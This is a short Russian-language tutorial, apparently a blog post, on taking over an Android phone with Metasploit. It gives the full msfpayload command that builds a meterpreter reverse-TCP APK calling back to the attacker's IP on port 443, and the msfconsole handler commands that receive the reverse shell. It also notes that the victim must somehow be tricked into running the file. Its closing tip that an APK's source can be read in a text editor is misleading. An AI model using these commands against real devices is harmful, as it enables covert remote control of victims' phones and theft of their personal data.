Взламываем Android-смартфон с помощью Metasploit

В наше время смартфоны уже давно перестали быть редкостью или роскошью, и конечно они стали лакомой целью для злоумышленников, т.к. в них сейчас храниться масса личной информации. Думаю и нам настало время испытать безопасность одного из популярных смартфонов под управлением Android.

Исходная информация:

IP адрес атакующего: 192.168.8.94

Порт атакующего: 443

Что понадобиться:

1. Metasploit framework (есть в Kali Linux)

2. Android-смартфон (на нашем столе HTC One с Android 4.4 KitKat)

Приступим к созданию эксплоита

1. Запускаем терминал

2. Создаем apk-пакет с данными, следующей командой:

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.8.94 LPORT=443 R > hack.apk

Т.к. мы будем делать эксплоит с обратным подключением, т.е. смартфон жертвы должен будет соединиться с компьютером атакующего, нам надо создать слушатель на указанном порту, для этого выполняем следующие команды:

msfconsole

use exploit/multi/handle

set payload android/meterpreter/reverse_tcp

set lhost 192.168.8.94

set lport 443

exploit

(Команда exploit запускает прослушку входящих соединений на порту 443)

Далее нам надо каким-либо образом заставить жертву запустить hack.apk сделанный нами ранее.

После того как жертва запустит этот файл на экране появится что-то похожее на:

Это говорит о том, что смартфон соединился с нашим компьютером и теперь мы можем им управлять из нашей консоли, вот пример:

Итог

1. Никогда не устанавливайте apk-пакеты из неизвестных источников

2. Если уж вы задумали установить, что-то подозрительное, то вы всегда можете вскрыть apk файл в текстовом редакторе и изучить его исходный код.

Вот такие дела, всем удачи!